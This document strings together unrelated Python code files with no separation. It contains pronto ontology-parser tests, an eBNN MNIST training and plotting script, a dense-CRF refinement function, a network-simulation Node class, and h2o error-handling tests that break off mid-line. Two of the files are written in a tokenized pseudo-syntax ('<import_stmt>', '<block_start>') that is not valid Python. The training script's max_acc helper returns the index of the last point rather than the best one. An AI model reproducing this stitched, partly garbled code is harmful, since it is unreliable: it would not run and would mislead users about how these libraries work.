<import_stmt>io<import_stmt>os<import_stmt>unittest<import_stmt>warnings<import_stmt>xml.etree.ElementTree<as>etree<import_stmt>pronto<class_stmt>TestRdfXMLParser(unittest.TestCase)<block_start>@staticmethod<def_stmt>get_ontology content<block_start>xml=f""" <rdf:RDF xmlns="http://purl.obolibrary.org/obo/TEMP#" xml:base="http://purl.obolibrary.org/obo/TEMP" xmlns:obo="http://purl.obolibrary.org/obo/" xmlns:owl="http://www.w3.org/2002/07/owl#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:xml="http://www.w3.org/XML/1998/namespace" xmlns:xsd="http://www.w3.org/2001/XMLSchema#" xmlns:doap="http://usefulinc.com/ns/doap#" xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#" xmlns:oboInOwl="http://www.geneontology.org/formats/oboInOwl#"> {content} </rdf:RDF> """<line_sep>s=io.BytesIO(xml.encode('utf-8'))<line_sep><return>pronto.Ontology(s import_depth=0)<block_end><def_stmt>setUp self<block_start>warnings.simplefilter("error")<block_end><def_stmt>tearDown self<block_start>warnings.simplefilter(warnings.defaultaction)<block_end># --- <def_stmt>test_iao self<block_start>warnings.simplefilter("ignore")<line_sep>path=os.path.join(__file__ ".." ".." "data" "iao.owl")<line_sep>iao=pronto.Ontology(os.path.realpath(path))<line_sep>self.assertEqual(len(iao.terms()) 245)<block_end><def_stmt>test_aeo self<block_start>warnings.simplefilter("ignore")<line_sep>path=os.path.join(__file__ ".." ".." "data" "aeo.owl")<line_sep>aeo=pronto.Ontology(os.path.realpath(path))<line_sep>self.assertEqual(len(aeo.terms()) 250)<line_sep>self.assertEqual(len(aeo.relationships()) 11)<line_sep>self.assertEqual(aeo["AEO:0000099"].name "keratin-based structure")<line_sep>self.assertEqual(len(aeo["AEO:0000099"].definition.xrefs) 1)<block_end><def_stmt>test_invalid_xml_file self<block_start>self.assertRaises(ValueError self.get_ontology "")<block_end># ------------------------------------------------------------------------ <def_stmt>test_metadata_auto_generated_by self<block_start>ont=self.get_ontology(""" <owl:Ontology> <oboInOwl:auto-generated-by>pronto</oboInOwl:auto-generated-by> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.auto_generated_by "pronto")<block_end><def_stmt>test_metadata_default_namespace self<block_start>ont=self.get_ontology(""" <owl:Ontology> <oboInOwl:hasDefaultNamespace rdf:datatype="http://www.w3.org/2001/XMLSchema#string">thing</oboInOwl:hasDefaultNamespace> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.default_namespace "thing")<block_end><def_stmt>test_metadata_data_version self# owl:versionrIRI <block_start>ont=self.get_ontology(""" <owl:Ontology rdf:about="http://purl.obolibrary.org/obo/ms.owl"> <owl:versionIRI rdf:resource="http://purl.obolibrary.org/obo/ms/4.1.30/ms.owl"/> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.ontology "ms")<line_sep>self.assertEqual(ont.metadata.data_version "4.1.30")<line_sep># doap:Version ont2=self.get_ontology("<owl:Ontology><doap:Version>0.1.0</doap:Version></owl:Ontology>")<line_sep>self.assertEqual(ont2.metadata.data_version "0.1.0")<block_end><def_stmt>test_metadata_format_version self<block_start>ont=self.get_ontology(""" <owl:Ontology> <oboInOwl:hasOBOFormatVersion>1.2</oboInOwl:hasOBOFormatVersion> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.format_version "1.2")<block_end><def_stmt>test_metadata_imports self<block_start>ont=self.get_ontology(""" <owl:Ontology> <owl:imports rdf:resource="http://purl.obolibrary.org/obo/ms.obo"/> </owl:Ontology> 
""")<line_sep>self.assertIn("http://purl.obolibrary.org/obo/ms.obo" ont.metadata.imports)<block_end><def_stmt>test_metadata_saved_by self<block_start>ont=self.get_ontology(""" <owl:Ontology> <oboInOwl:savedBy><NAME></oboInOwl:savedBy> </owl:Ontology> """)<line_sep>self.assertEqual(ont.metadata.saved_by "<NAME>")<block_end># ------------------------------------------------------------------------ <def_stmt>test_term_consider self# Extract from `oboInOwl:consider` text <block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:consider rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:002</oboInOwl:consider> </owl:Class> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_002"/> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertIn("TST:002" ont)<line_sep>self.assertIn(ont["TST:002"] ont["TST:001"].consider)<line_sep># Extract from `oboInOwl:consider` RDF resource ont2=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:consider rdf:resource="http://purl.obolibrary.org/obo/TST_002"/> </owl:Class> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_002"/> """)<line_sep>self.assertIn("TST:001" ont2)<line_sep>self.assertIn("TST:002" ont2)<line_sep>self.assertIn(ont2["TST:002"] ont2["TST:001"].consider)<block_end><def_stmt>test_term_definition_as_property self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <obo:IAO_0000115 rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a term</obo:IAO_0000115> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(ont["TST:001"].definition "a term")<line_sep>self.assertEqual(len(ont["TST:001"].definition.xrefs) 0)<block_end><def_stmt>test_term_definition_as_axiom self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <obo:IAO_0000115 rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a term</obo:IAO_0000115> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> <owl:Axiom> <owl:annotatedSource rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> <owl:annotatedProperty rdf:resource="http://purl.obolibrary.org/obo/IAO_0000115"/> <owl:annotatedTarget rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a term</owl:annotatedTarget> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> </owl:Axiom> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(ont["TST:001"].definition "a term")<line_sep>self.assertEqual(list(ont["TST:001"].definition.xrefs)[0] pronto.Xref("ISBN:1234"))<block_end><def_stmt>test_term_multiple_labels self<block_start>txt=""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <rdfs:label>A</rdfs:label> <rdfs:label>B</rdfs:label> </owl:Class> """<line_sep># check multiple labels is a syntax error in error mode <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("error" pronto.warnings.SyntaxWarning)<with_stmt>self.assertRaises(SyntaxError)<block_start>ont=self.get_ontology(txt)<block_end><block_end># check multiple labels is fine in ignore mode <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" 
pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(txt)<line_sep>self.assertIn(ont['TST:001'].name ["A" "B"])<block_end><block_end><def_stmt>test_term_subclass_of self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_002"> <rdfs:subClassOf rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> </owl:Class> """)<line_sep>self.assertIn(ont["TST:001"] ont["TST:002"].superclasses().to_set())<line_sep>self.assertIn(ont["TST:002"] ont["TST:001"].subclasses().to_set())<block_end><def_stmt>test_term_subset self<block_start>ont=self.get_ontology(""" <owl:Ontology rdf:about="http://purl.obolibrary.org/obo/tst.owl"/> <owl:AnnotationProperty rdf:about="http://purl.obolibrary.org/obo/tst#ss"> <rdfs:comment rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a subset</rdfs:comment> <rdfs:subPropertyOf rdf:resource="http://www.geneontology.org/formats/oboInOwl#SubsetProperty"/> </owl:AnnotationProperty> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <oboInOwl:inSubset rdf:resource="http://purl.obolibrary.org/obo/tst#ss"/> </owl:Class> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(ont["TST:001"].subsets {"ss"})<block_end><def_stmt>test_term_synonym_as_property self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasExactSynonym rdf:datatype="http://www.w3.org/2001/XMLSchema#string">stuff</oboInOwl:hasExactSynonym> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> """)<block_end>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(len(ont["TST:001"].synonyms) 1)<line_sep>syn=next(iter(ont["TST:001"].synonyms))<line_sep>self.assertEqual(syn.description "stuff")<line_sep>self.assertEqual(syn.scope "EXACT")<line_sep>self.assertEqual(syn.xrefs set())<block_end><def_stmt>test_term_synonym_as_axiom self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasExactSynonym rdf:datatype="http://www.w3.org/2001/XMLSchema#string">stuff</oboInOwl:hasExactSynonym> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> <owl:Axiom> <owl:annotatedSource rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> <owl:annotatedProperty rdf:resource="http://www.geneontology.org/formats/oboInOwl#hasExactSynonym"/> <owl:annotatedTarget rdf:datatype="http://www.w3.org/2001/XMLSchema#string">stuff</owl:annotatedTarget> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> </owl:Axiom> """)<line_sep>self.assertIn("TST:001" ont)<line_sep>self.assertEqual(len(ont["TST:001"].synonyms) 1)<line_sep>syn=next(iter(ont["TST:001"].synonyms))<line_sep>self.assertEqual(syn.description "stuff")<line_sep>self.assertEqual(syn.scope "EXACT")<line_sep>self.assertEqual(syn.xrefs {pronto.Xref("ISBN:1234")})<block_end><block_end><def_stmt>test_term_relationship self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty 
rdf:about="http://purl.obolibrary.org/obo/RO_0002202"> <rdf:type rdf:resource="http://www.w3.org/2002/07/owl#TransitiveProperty"/> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">RO:0002202</oboInOwl:hasDbXref> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string"></oboInOwl:id> <oboInOwl:shorthand rdf:datatype="http://www.w3.org/2001/XMLSchema#string">develops_from</oboInOwl:shorthand> <rdfs:label rdf:datatype="http://www.w3.org/2001/XMLSchema#string">develops from</rdfs:label> </owl:ObjectProperty> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_002"> <rdfs:subClassOf> <owl:Restriction> <owl:onProperty rdf:resource="http://purl.obolibrary.org/obo/RO_0002202"/> <owl:someValuesFrom rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> </owl:Restriction> </rdfs:subClassOf> </owl:Class> """)<line_sep>self.assertIn("develops_from" [r.id<for>r ont.relationships()])<line_sep>develops_from=ont.get_relationship("develops_from")<line_sep>self.assertIn(ont["TST:001"] ont["TST:002"].relationships[develops_from])<block_end><def_stmt>test_term_xref_as_property_resource self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> <oboInOwl:id rdf:resource="http://purl.obolibrary.org/obo/ISBN_1234"/> </owl:Class> """)<block_end>self.assertEqual(len(ont["TST:001"].xrefs) 1)<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].id "ISBN:1234")<block_end><def_stmt>test_term_xref_as_property_text self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> """)<block_end>self.assertEqual(len(ont["TST:001"].xrefs) 1)<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].id "ISBN:1234")<block_end><def_stmt>test_term_xref_as_axiom_without_description self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> <owl:Axiom> <owl:annotatedSource rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> <owl:annotatedProperty rdf:resource="http://www.geneontology.org/formats/oboInOwl#hasDbXref"/> <owl:annotatedTarget rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</owl:annotatedTarget> </owl:Axiom> """)<block_end>self.assertEqual(len(ont["TST:001"].xrefs) 1)<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].id "ISBN:1234")<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].description <none>)<block_end><def_stmt>test_term_xref_as_axiom_with_description 
self<block_start><with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(""" <owl:Ontology/> <owl:Class rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:hasDbXref rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</oboInOwl:hasDbXref> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> </owl:Class> <owl:Axiom> <owl:annotatedSource rdf:resource="http://purl.obolibrary.org/obo/TST_001"/> <owl:annotatedProperty rdf:resource="http://www.geneontology.org/formats/oboInOwl#hasDbXref"/> <owl:annotatedTarget rdf:datatype="http://www.w3.org/2001/XMLSchema#string">ISBN:1234</owl:annotatedTarget> <rdfs:label rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a great book</rdfs:label> </owl:Axiom> """)<block_end>self.assertEqual(len(ont["TST:001"].xrefs) 1)<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].id "ISBN:1234")<line_sep>self.assertEqual(list(ont["TST:001"].xrefs)[0].description "a great book")<block_end># ------------------------------------------------------------------------ <def_stmt>test_relationship_cyclic self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <oboInOwl:is_cyclic rdf:datatype="http://www.w3.org/2001/XMLSchema#boolean">true</oboInOwl:is_cyclic> </owl:ObjectProperty> """)<line_sep>self.assertIn("TST:001" ont.relationships())<line_sep>self.assertTrue(ont.get_relationship("TST:001").cyclic)<block_end><def_stmt>test_relationship_functional self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <rdf:type rdf:resource="http://www.w3.org/2002/07/owl#FunctionalProperty"/> </owl:ObjectProperty> """)<line_sep>self.assertIn("TST:001" ont.relationships())<line_sep>self.assertTrue(ont.get_relationship("TST:001").functional)<block_end><def_stmt>test_relationship_multiple_labels self<block_start>txt=""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <rdfs:label>A</rdfs:label> <rdfs:label>B</rdfs:label> </owl:ObjectProperty> """<line_sep># check multiple labels is a syntax error in error mode <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("error" pronto.warnings.SyntaxWarning)<with_stmt>self.assertRaises(SyntaxError)<block_start>ont=self.get_ontology(txt)<block_end><block_end># check multiple labels is fine in ignore mode <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter("ignore" pronto.warnings.SyntaxWarning)<line_sep>ont=self.get_ontology(txt)<line_sep>self.assertIn(ont.get_relationship('TST:001').name ["A" "B"])<block_end><block_end><def_stmt>test_relationship_reflexive self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <rdf:type rdf:resource="http://www.w3.org/2002/07/owl#ReflexiveProperty"/> </owl:ObjectProperty> """)<line_sep>self.assertIn("TST:001" ont.relationships())<line_sep>self.assertTrue(ont.get_relationship("TST:001").reflexive)<block_end><def_stmt>test_relationship_subset self<block_start>ont=self.get_ontology(""" <owl:Ontology 
rdf:about="http://purl.obolibrary.org/obo/tst.owl"/> <owl:AnnotationProperty rdf:about="http://purl.obolibrary.org/obo/tst#ss"> <rdfs:comment rdf:datatype="http://www.w3.org/2001/XMLSchema#string">a subset</rdfs:comment> <rdfs:subPropertyOf rdf:resource="http://www.geneontology.org/formats/oboInOwl#SubsetProperty"/> </owl:AnnotationProperty> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/tst#friend_of"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">friend_of</oboInOwl:id> <oboInOwl:inSubset rdf:resource="http://purl.obolibrary.org/obo/tst#ss"/> </owl:ObjectProperty> """)<line_sep>self.assertIn("friend_of" ont.relationships())<line_sep>self.assertEqual(ont.get_relationship("friend_of").subsets {"ss"})<block_end><def_stmt>test_relationship_symmetric self<block_start>ont=self.get_ontology(""" <owl:Ontology/> <owl:ObjectProperty rdf:about="http://purl.obolibrary.org/obo/TST_001"> <oboInOwl:id rdf:datatype="http://www.w3.org/2001/XMLSchema#string">TST:001</oboInOwl:id> <rdf:type rdf:resource="http://www.w3.org/2002/07/owl#SymmetricProperty"/> </owl:ObjectProperty> """)<line_sep>self.assertIn("TST:001" ont.relationships())<line_sep>self.assertTrue(ont.get_relationship("TST:001").symmetric)<block_end><block_end>
import os
import sys
sys.path.append('..')
import argparse
import chainer
from elaas.elaas import Collection
from elaas.family.simple import SimpleHybridFamily
from elaas.family.binary import BinaryFamily
from elaas.family.float import FloatFamily
from elaas.family.multi_input_edge_with_dropout import MultiInputEdgeDropoutFamily
from visualize import visualize
import deepopt.chooser
import matplotlib
matplotlib.rcParams['font.size'] = 20.0
import matplotlib.pyplot as plt


def max_acc(trace):
    acc = 0
    best_idx = 0
    for i, t in enumerate(trace):
        if t['action'] == 'add_point':
            acc = max(acc, t['y'])
            best_idx = i
    return acc, best_idx


model_dict = {
    "binary": BinaryFamily,
    "float": FloatFamily,
}


def train_model(args, model_type, nfilters):
    trainer = Collection(model_type, args.save_dir, nepochs=args.epochs, verbose=args.verbose)
    trainer.set_model_family(model_dict[model_type])
    train, test = chainer.datasets.get_mnist(ndim=3)
    data_shape = train._datasets[0].shape[1:]
    trainer.add_trainset(train)
    trainer.add_testset(test)
    trainer.set_searchspace(
        nfilters_embeded=[nfilters],
        nlayers_embeded=[2],
        lr=[1e-3]
    )
    res = trainer.train(niters=args.iters, bootstrap_nepochs=args.bootstrap_epochs)
    return max_acc(res)[0]


parser = argparse.ArgumentParser(description='Training Simple eBNN model')
parser.add_argument('-s', '--save_dir', default='_models')
parser.add_argument('-c', '--c_file', default=os.path.join('c', 'simple.h'))
parser.add_argument('--inter_file', default=os.path.join('c', 'inter_simple.h'))
parser.add_argument('-i', '--iters', type=int, default=10)
parser.add_argument('-e', '--epochs', type=int, default=20)
parser.add_argument('-b', '--bootstrap_epochs', type=int, default=2)
parser.add_argument('-v', '--verbose', action='store_true')
parser.add_argument('--gen_inter', action='store_true')
args = parser.parse_args()

names = ['float', 'binary']
accs = {name: [] for name in names}
mem = {name: [] for name in names}

for i in [1, 2, 3, 4, 5]:
    acc = train_model(args, 'float', i)
    print(acc)
    accs['float'].append(acc * 100)
    mem['float'].append(i * 32 * 32 * 9)

print("====")

binary_accs = []
binary_mem = []
for i in [1, 3, 5, 10, 20, 40, 80, 160]:
    acc = train_model(args, 'binary', i)
    print(acc)
    accs['binary'].append(acc * 100)
    mem['binary'].append(i * 32 * 9)

# plot code
linewidth = 4
ms = 8
colors = {'binary': '#FF944D', 'float': '#FF8F80'}
styles = {'binary': '-o', 'float': '-.o'}
plt.figure(figsize=(8, 6.5))
for name in names:
    plt.plot(mem[name], accs[name], styles[name], linewidth=linewidth,
             ms=ms, color=colors[name], label=name)
plt.xlabel('Memory (bits)')
plt.ylabel('Classification Accuracy (%)')
plt.legend(loc=0, prop={'size': 14})
plt.tight_layout()
plt.grid()
plt.savefig("comparison_2layer.png")
plt.clf()
import numpy as np
import pydensecrf.densecrf as dcrf
from pydensecrf.utils import unary_from_softmax


def crf_inference(img, probs, t=10, scale_factor=1, labels=21):
    """Refine softmax class probabilities with a fully-connected CRF.

    img:    (H, W, 3) uint8 RGB image
    probs:  (labels, H, W) softmax class probabilities
    t:      number of mean-field inference iterations
    returns (labels, H, W) refined probabilities
    """
    h, w = img.shape[:2]
    n_labels = labels

    d = dcrf.DenseCRF2D(w, h, n_labels)

    # Unary term from the negative log of the softmax probabilities
    unary = unary_from_softmax(probs)
    unary = np.ascontiguousarray(unary)
    d.setUnaryEnergy(unary)

    # Pairwise terms: appearance-agnostic smoothness + color-dependent bilateral kernel
    d.addPairwiseGaussian(sxy=3 / scale_factor, compat=3)
    d.addPairwiseBilateral(sxy=80 / scale_factor, srgb=13, rgbim=np.copy(img), compat=10)

    Q = d.inference(t)

    return np.array(Q).reshape((n_labels, h, w))
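
# Illustrative usage sketch (added for clarity, not part of the original module).
# Shapes follow the usual pydensecrf conventions: `image` is an (H, W, 3) uint8 RGB
# array and `softmax` is an (n_cls, H, W) float array of class probabilities.
if __name__ == "__main__":
    H, W, n_cls = 120, 160, 21
    image = np.random.randint(0, 255, size=(H, W, 3), dtype=np.uint8)
    softmax = np.random.dirichlet(np.ones(n_cls), size=(H, W)).transpose(2, 0, 1)
    refined = crf_inference(image, softmax.astype(np.float32), labels=n_cls)
    print(refined.shape)  # (21, 120, 160)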
# -*- coding: utf-8 -*- # MIT License: <NAME> <import_stmt>random<import_stmt>threading<import_stmt>time<import_from_stmt>collections defaultdict<try_stmt><block_start><import_from_stmt>queue Queue<block_end><except_stmt>ImportError<block_start><import_from_stmt>Queue Queue<block_end><import_from_stmt>.filters LoopbackFilter<line_sep># Physical Layer (copper, fiber, audio, wireless) # Link Layer (ethernet, ARP, PPP): links.py # Network Layer (IPv4, IPv6, ICMP, MeshP): scapy # Transport Layer (TCP, UDP, SCTP): scapy # Nodes connect to each other over links. The node has a runloop that pulls packets off the link's incoming packet Queue, # runs them through its list of filters, then places it in the nodes incoming packet queue for that interface node.inq. # the Node's Program is has a seperate runloop in a different thread that is constantly calling node.inq.get(). # The program does something with the packet (like print it to the screen, or reply with "ACK"), and sends any outgoing responses # by calling the Node's send() method directly. The Node runs the packet through it's outgoing packet filters in order, then # if it wasn't dropped, calls the network interface's .send() method to push it over the network. # --> incoming packet queue | -> pulls packets off link's inq -> filters -> node.inq | -> pulls packets off the node's inq # [LINK] | [NODE] | [PROGRAM] # <-- outgoing Link.send() | <---- outgoing filters <----- Node.send() <----- | <- sends responses by calling Node.send() <class_stmt>Node(threading.Thread)<block_start>"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to. Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle. Programs process packets off the node's incoming queue, then send responses out through node's outbound filters, and finally out to the right network interface. 
"""<def_stmt>__init__ self interfaces=<none> name="n1" promiscuous=<false> mac_addr=<none> Filters=() Program=<none><block_start>threading.Thread.__init__(self)<line_sep>self.name=name<line_sep>self.interfaces=interfaces<or>[]<line_sep>self.keep_listening=<true><line_sep>self.promiscuous=promiscuous<line_sep>self.mac_addr=mac_addr<or>self._generate_MAC(6 2)<line_sep>self.inq=defaultdict(Queue)# TODO: convert to bounded ring-buffer self.filters=[LoopbackFilter()]+[F()<for>F Filters]# initialize the filters that shape incoming and outgoing traffic before it hits the program self.program=Program(node=self)<if>Program<else><none># init the program that will be processing incoming packets <block_end><def_stmt>__repr__ self<block_start><return>"[{0}]".format(self.name)<block_end><def_stmt>__str__ self<block_start><return>self.__repr__()<block_end>@staticmethod<def_stmt>_generate_MAC segments=6 segment_length=2 delimiter=":" charset="0123456789abcdef"<block_start>"""generate a non-guaranteed-unique mac address"""<line_sep>addr=[]<for_stmt>_ range(segments)<block_start>sub=''.join(random.choice(charset)<for>_ range(segment_length))<line_sep>addr.append(sub)<block_end><return>delimiter.join(addr)<block_end><def_stmt>log self *args<block_start>"""stdout and stderr for the node"""<line_sep>print("%s %s"%(str(self).ljust(8) " ".join(str(x)<for>x args)))<block_end><def_stmt>stop self<block_start>self.keep_listening=<false><if_stmt>self.program<block_start>self.program.stop()<block_end>self.join()<line_sep><return><true><block_end>### Runloop <def_stmt>run self<block_start>"""runloop that gets triggered by node.start() reads new packets off the link and feeds them to recv() """<if_stmt>self.program<block_start>self.program.start()<block_end><while_stmt>self.keep_listening<block_start><for_stmt>interface self.interfaces<block_start>packet=interface.recv(self.mac_addr<if><not>self.promiscuous<else>"00:00:00:00:00:00")<if_stmt>packet<block_start>self.recv(packet interface)<block_end>time.sleep(0.01)<block_end><block_end>self.log("Stopped listening.")<block_end>### IO <def_stmt>recv self packet interface<block_start>"""run incoming packet through the filters, then place it in its inq"""<line_sep># the packet is piped into the first filter, then the result of that into the second filter, etc. <for_stmt>f self.filters<block_start><if_stmt><not>packet<block_start><break><block_end>packet=f.tr(packet interface)<block_end><if_stmt>packet# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq # self.log("IN ", str(interface).ljust(30), packet.decode()) <block_start>self.inq[interface].put(packet)<block_end><block_end><def_stmt>send self packet interfaces=<none><block_start>"""write packet to given interfaces, default is broadcast to all interfaces"""<line_sep>interfaces=interfaces<or>self.interfaces# default to all interfaces interfaces=interfaces<if>hasattr(interfaces '__iter__')<else>[interfaces]<for_stmt>interface interfaces<block_start><for_stmt>f self.filters<block_start>packet=f.tx(packet interface)# run outgoing packet through the filters <block_end><if_stmt>packet# if not dropped, log the transmit and pass it to the interface's send method # self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode()) <block_start>interface.send(packet)<block_end><block_end><block_end><block_end>
<import_stmt>sys<line_sep>sys.path.insert(1 "../../")<import_stmt>h2o<import_from_stmt>h2o.estimators H2OGradientBoostingEstimator<import_from_stmt>h2o.exceptions H2OResponseError<import_from_stmt>h2o.schemas H2OErrorV3 H2OModelBuilderErrorV3<import_from_stmt>tests pyunit_utils<as>pu<def_stmt>test_backend_error <block_start><try_stmt><block_start>h2o.api("GET /3/Foo" data=dict(bar='baz'))<assert_stmt><false> "API call should have failed"<block_end><except_stmt>H2OResponseError<as>e<block_start>backend_err=e.args[0]<assert_stmt>isinstance(backend_err H2OErrorV3)<assert_stmt>backend_err.endpoint<eq>"GET /3/Foo"<assert_stmt>backend_err.payload<eq>(<none> <none> <none> dict(bar='baz'))# yeah! because on GET, data becomes params and turns into None, this is so confusing! <assert_stmt>backend_err.http_status<eq>404<assert_stmt>isinstance(backend_err.stacktrace list)<assert_stmt>len(backend_err.stacktrace)<g>10<assert_stmt>backend_err.stacktrace[0]<eq>"water.exceptions.H2ONotFoundArgumentException: Resource /3/Foo not found"<assert_stmt>backend_err.msg<eq>"Resource /3/Foo not found"<assert_stmt>backend_err.dev_msg<eq>backend_err.msg<assert_stmt>backend_err.exception_msg<eq>backend_err.msg<assert_stmt>backend_err.exception_type<eq>"water.exceptions.H2ONotFoundArgumentException"<assert_stmt>backend_err.error_url<eq>"Resource /3/Foo"<assert_stmt>backend_err.timestamp<g>0<assert_stmt>len(backend_err.values)<eq>0<block_end><block_end><def_stmt>test_model_builds_error <block_start><try_stmt><block_start>df=h2o.import_file(path=pu.locate("smalldata/prostate/prostate.csv"))<line_sep>gbm=H2OGradientBoostingEstimator()<line_sep>gbm.train(y=-1 training_frame=df offset_column="foo")<assert_stmt><false> "model training should have failed"<block_end><except_stmt>H2OResponseError<as>e<block_start>mb_err=e.args[0]<assert_stmt>isinstance(mb_err H2OModelBuilderErrorV3)<assert_stmt>mb_err.endpoint<eq>"POST 